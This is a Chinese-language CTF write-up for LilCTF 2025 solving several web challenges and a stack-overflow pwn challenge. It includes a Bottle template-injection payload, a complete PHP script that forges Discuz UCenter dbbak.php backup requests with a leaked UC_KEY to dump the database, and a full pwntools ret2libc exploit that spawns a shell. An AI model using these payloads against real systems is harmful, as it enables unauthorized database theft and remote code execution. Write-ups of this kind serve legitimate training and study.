LilCTF 2025 WP

我只写了 Web 题，所以只有 Web 的 WP 是我写的，其他的题目是 tgs-ollaic 和 unkn0wn 一并解决的，其他的 WP 是 tg-ollaic 写的。

我只展示了一部分 WP，其他的去 tgs-ollaic 博客里看吧。

Web

Ekko_note

分析

查看源代码可以找到的提示：random seed

目标是拿到管理员权限执行命令获取 flag

查看源码有一个修改密码发送 Token 的模块，重点关注直接修改管理员密码

有一个 UUID8，UUID 生成要用到 random，而上面设置了 seed 到 startup time，翻源码 + 网络控制台可知有一个 api 在登录状态下会一直发送 startup time，注册一个账号，登录，然后拿到 startup time

构造脚本

random seed 为 server startup time, 以此生成相应的 UUID8

UUID8 生成脚本搞了一圈没搞定，在搜索的时候发现 py3.14 rc2 中就有这个 api，二话不说，直接 paru python314 然后直接调用相应的 uuid8 api 生成相应的 TOKEN, 修改管理员密码

找 flag

最后，尝试着执行一些命令、想办法找到 flag，使用 nc 将结果输出到服务器（看着场景比较简单，没用反弹 shell（因为我还不会反弹 shell））

ez_bottle

分析源码可发现使用了 bottle 这个轻量级 Web 框架，分析题目逻辑，发现是渲染 template(模板)，重点关注通过模板注入来获取 flag，我们发现 {}<> 都用不了，但是查官网可知， bottle 还有 % 可以用来调用一行 python 脚本。

那其他的系统 api 屏蔽词怎么办呢？

使用斜体可以绕过检测
因为有上传系统，我们可以先上传一个文件，获取地址，再用后上传的文件去加载这个文件

我选择了 2，因为要传递回显，不用 {} 的话我不知道怎么传

最后构造出来的脚本很简洁

1
% import os
2
% with open('/flag', 'r', encoding='utf-8') as f:
3
    % content = f.read()
4
    {{content}}
5
% end

上传后获取 a.tpl 的 hash，填到 b.tpl 中

1
% include('uploads/8b961bf855a7b98f9be204d5f9deb096/a.tpl')

随后上传并访问 t.tpl 即可绕过检测

（构造 a.tpl 的时候一直以为题目中 /flag 指的是网站根目录，结果是在系统根目录）

我曾有一份工作

扫描发现 www.zip

下载，发现 config_ucenter.php 中有 UC_KEY，另一个 config_global.php 文件中还有authkey

但是我们的目标不是 getshell 而是获取数据库中 pre_a_flag 的值，所以我们重点关注数据库

发现有一个 sql backup 文件夹，可惜里面是空的，如果要爆破目录复杂度太高，放弃

搜索 UC_KEY 利用方法，重点关注 uc.php, dbbak.php 的 api

大量搜索 uc.php 寻找可以利用这两个 key 的 api，要么就是太过复杂，要么就是无法确保一定会成功，而且很多都需要 admin 权限（这个权限我想了一下，不好搞）

回到 dbbak.php, 料想备份数据库的操作会比较轻松，所以想办法通过这里的 api 备份一次数据库

我们搜索发现 method export 可以用来备份数据库，回溯 $get 发现是由 $code 推导生成的

1
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);

看一下 _authcode 函数，发现其同时实现了解密逻辑，直接其调用 DECODE 即可

因为还涉及时间戳，所以需要程序动态生成请求

把 dbbak.php 扔给 DeepSeek, 让他生成一份请求脚本

1
<?php
2
// 配置参数
3
$targetUrl = "";
4
$UC_KEY = "N8ear1n0q4s646UeZeod130eLdlbqfs1BbRd447eq866gaUdmek7v2D9r9EeS6vb";
5
$apptype = "discuzx";
6

7
// 从 dbbak.php 提取的加密函数
8
function _authcode($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
9
    $ckey_length = 4;
10
    $key = md5($key ? $key : '');
11
    $keya = md5(substr($key, 0, 16));
12
    $keyb = md5(substr($key, 16, 16));
13
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
14

15
    $cryptkey = $keya.md5($keya.$keyc);
16
    $key_length = strlen($cryptkey);
17

18
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
19
    $string_length = strlen($string);
20

21
    $result = '';
22
    $box = range(0, 255);
23

24
    $rndkey = array();
25
    for($i = 0; $i <= 255; $i++) {
26
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
27
    }
28

29
    for($j = $i = 0; $i < 256; $i++) {
30
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
31
        $tmp = $box[$i];
32
        $box[$i] = $box[$j];
33
        $box[$j] = $tmp;
34
    }
35

36
    for($a = $j = $i = 0; $i < $string_length; $i++) {
37
        $a = ($a + 1) % 256;
38
        $j = ($j + $box[$a]) % 256;
39
        $tmp = $box[$a];
40
        $box[$a] = $box[$j];
41
        $box[$j] = $tmp;
42
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
43
    }
44

45
    if($operation == 'DECODE') {
46
        if(((int)substr($result, 0, 10) == 0 || (int)substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) === substr(md5(substr($result, 26).$keyb), 0, 16)) {
47
            return substr($result, 26);
48
        } else {
49
            return '';
50
        }
51
    } else {
52
        return $keyc.str_replace('=', '', base64_encode($result));
53
    }
54
}
55

56
// 1. 构造请求参数
57
$get = [
58
    'method' => 'export',
59
    'time' => time(),
60
    'volume' => 0,
61
    'sqlpath' => '',
62
    'backupfilename' => date('ymd').'_'.bin2hex(random_bytes(3))
63
];
64

65
// 2. 生成查询字符串并加密
66
$queryString = http_build_query($get);
67
$code = _authcode($queryString, 'ENCODE', $UC_KEY);
68

69
// 3. 构造最终请求 URL
70
$requestUrl = $targetUrl."?apptype=".$apptype."&code=".urlencode($code);
71

72
// 4. 发送 HTTP 请求
73
echo "正在发送请求到：".$requestUrl."\n\n";
74

75
$ch = curl_init();
76
curl_setopt($ch, CURLOPT_URL, $requestUrl);
77
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
78
curl_setopt($ch, CURLOPT_HEADER, false);
79
$response = curl_exec($ch);
80
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
81
curl_close($ch);
82

83
echo $response;
84

85
// 5. 处理响应
86
echo "HTTP 状态码：".$httpCode."\n";
87
echo "响应内容:\n";
88
echo "----------------------------------------\n";
89

90
if($httpCode == 200) {
91
    // 尝试解析 XML 响应
92
    $xml = @simplexml_load_string($response);
93
    if($xml !== false) {
94
        echo "备份操作结果:\n";
95

96
        // 显示错误信息（如果有）
97
        if(isset($xml->error)) {
98
            echo "错误代码：".$xml->error['errorCode']."\n";
99
            echo "错误信息：".$xml->error['errorMessage']."\n";
100
        }
101

102
        // 显示文件信息（成功时）
103
        if(isset($xml->fileinfo)) {
104
            echo "\n备份文件信息:\n";
105
            echo "文件序号：".$xml->fileinfo->file_num."\n";
106
            echo "文件大小：".$xml->fileinfo->file_size." bytes\n";
107
            echo "文件名：".$xml->fileinfo->file_name."\n";
108
            echo "文件 URL: ".$xml->fileinfo->file_url."\n";
109
            echo "最后修改：".date('Y-m-d H:i:s', $xml->fileinfo->last_modify)."\n";
110
        }
111

112
        // 显示下一卷 URL（分卷备份时）
113
        if(isset($xml->nexturl) && !empty($xml->nexturl)) {
114
            echo "\n下一卷 URL:\n".$xml->nexturl."\n";
115
        }
116
    } else {
117
        // 非 XML 响应直接输出
118
        echo $response;
119
    }
120
} else {
121
    echo "请求失败，HTTP 状态码：".$httpCode."\n";
122
    echo $response;
123
}
124

125
echo "\n----------------------------------------\n";
126
?>

随后运行可以拿到链接地址，访问可以下载 sql 文件

打开，搜索 pre_a_flag，找到 VALUE 那一行，拿到 flag 的 hex，放到赛博厨子中解码即可

PWN

签到

对拿到的三个文件 file 一下，发现要用加载器来运行 ./ld-linux-x86-64.so.2 --library-path . ./pwn, 而且 pwn 是 not stripped 的，可以方便地查看各种函数。

checksec 一下，发现没有栈保护 (No Canary), 地址不会随机化 (No PIE), 某些内存区域不可执行 (NX enabled)。

尝试运行程序，发现输入过长的 A 会 SIGSEV, 可以栈溢出。

漏洞分析

用 IDA 打开，分析 main 函数。

1
; Attributes: bp-based frame
2

3
; int __cdecl main(int argc, const char **argv, const char **envp)
4
public main
5
main proc near
6

7
buf= byte ptr -70h
8

9
; __unwind {
10
endbr64
11
push    rbp
12
mov     rbp, rsp
13
sub     rsp, 70h
14
mov     rax, cs:stdin@GLIBC_2_2_5
15
mov     esi, 0          ; buf
16
mov     rdi, rax        ; stream
17
call    _setbuf
18
mov     rax, cs:__bss_start
19
mov     esi, 0          ; buf
20
mov     rdi, rax        ; stream
21
call    _setbuf
22
mov     rax, cs:stderr@GLIBC_2_2_5
23
mov     esi, 0          ; buf
24
mov     rdi, rax        ; stream
25
call    _setbuf
26
lea     rax, s          ; "Welcome to lilctf!"
27
mov     rdi, rax        ; s
28
call    _puts
29
lea     rax, aWhatSYourName ; "What's your name?"
30
mov     rdi, rax        ; s
31
call    _puts
32
lea     rax, [rbp+buf]
33
mov     edx, 200h       ; nbytes
34
mov     rsi, rax        ; buf
35
mov     edi, 0          ; fd
36
mov     eax, 0
37
call    _read
38
mov     eax, 0
39
leave
40
retn
41
; } // starts at 401178
42
main endp
43

44
_text ends

显然，程序在栈上开辟了 0x70 的缓冲区，却调用 read 函数试图读入 0x200 的数据，存在栈溢出漏洞。经过计算，覆盖到返回地址需要 112 (buf) + 8 (rbp) = 120 字节的填充。

攻击思路

检查函数列表，没有发现 win 或 get_shell 之类的后门函数，做不了 ret2text。

由于 NX 开启，无法直接执行栈上的 shellcode。但我们可以劫持程序执行流，跳转到 libc 中现有的 system 函数，执行 system("/bin/sh") 来获取 shell。

然而，由于 ASLR 的存在，libc 的基地址每次运行都是随机的。因此，攻击分两步：

先用一个 libc 函数的真实地址来计算基址
再利用这个基址来计算 system 的地址并调用

计算 `libc` 基地址

我们的目标是诱导程序执行 puts(puts@got)。 puts@got 中存放着 puts 函数在内存中的真实地址，调用 puts 把它打印出来，我们就能知道这个地址。（当然，之后我们应诱导重进 main，而非重启程序，因为重启之后基地址又变了。）

寻找 Gadgets

我们需要一个 pop rdi; ret 的 gadget 来给 puts 函数传递参数 (puts@got 的地址)。（这段汇编的意思是将栈最上面的值弹出并加载到寄存器中，随即返回）

1
ROPgadget --binary ./pwn --only "pop rdi|ret"

构建 Payload 1, 我们的 ROP 链要做三件事：

将 puts@got 的地址放入 rdi 寄存器。
调用 puts@plt。
执行完后，返回 main 函数的开头，以便我们进行第二次攻击。

1
rop_chain_1 = p64(pop_rdi)       # 执行 pop rdi; ret
2
rop_chain_1 += p64(puts_got)     # 将 puts@got 的地址放入 rdi
3
rop_chain_1 += p64(puts_plt)     # 调用 puts
4
rop_chain_1 += p64(main_addr)    # puts 返回后，重新执行 main

Get Shell

拿到 puts 的真实地址后，减去它在 libc 文件中的偏移，就算出了 libc 的基地址。然后，就可以计算出 system 和 "/bin/sh" 的精确地址。

解决栈对齐问题，在 64 位系统中，调用函数时要求栈是 16 字节对齐的。我们的 ROP 链从 main 函数 ret (弹出 8 字节) 开始，破坏了对齐。如果直接调用 system, 会导致 SIGSEGV。

解决方案：在调用 system 之前，先跳转到一个 ret gadget, 它会再弹出 8 字节，从而让栈 (8+8=16) 重新对齐。

构建 Payload 2, 这次的 ROP 链目标是执行 system("/bin/sh")。

1
rop_chain_2 = p64(ret_gadget)    # 用于栈对齐
2
rop_chain_2 += p64(pop_rdi)      # 执行 pop rdi; ret
3
rop_chain_2 += p64(bin_sh_addr)  # 将 "/bin/sh" 的地址放入 rdi
4
rop_chain_2 += p64(system_addr)  # 调用 system

最终 Exploit 脚本

将上述思路整合，编写 pwntools 脚本。

1
from pwn import *
2

3
USE_REMOTE = True
4
HOST = ''
5
PORT = 33394
6

7
elf = context.binary = ELF('./pwn')
8
libc = ELF('./libc.so.6')
9

10
if USE_REMOTE:
11
    p = remote(HOST, PORT)
12
else:
13
    p = process(['./ld-linux-x86-64.so.2', '--library-path', '.', './pwn'])
14

15
rop = ROP(elf)
16
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
17
ret_gadget = rop.find_gadget(['ret'])[0]
18

19
puts_plt = elf.plt['puts']
20
puts_got = elf.got['puts']
21
main_addr = elf.symbols['main']
22
padding = b'A' * 120
23

24
log.info("### Stage 1: Leaking puts address...")
25
p.recvuntil(b"What's your name?\n")
26
payload1 = padding + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
27
p.sendline(payload1)
28
leaked_data = p.recvline().strip()
29
leaked_puts_addr = u64(leaked_data.ljust(8, b'\x00'))
30

31
p.recvuntil(b"What's your name?\n")
32
libc_base = leaked_puts_addr - libc.symbols['puts']
33
system_addr = libc_base + libc.symbols['system']
34
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
35
payload2 = padding + p64(ret_gadget) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
36
log.info("### Stage 2: Getting Shell...")
37
p.sendline(payload2)
38

39
p.interactive()

运行脚本，成功拿到 shell

1
ls
2
cat ./flag

拿到 flag

Web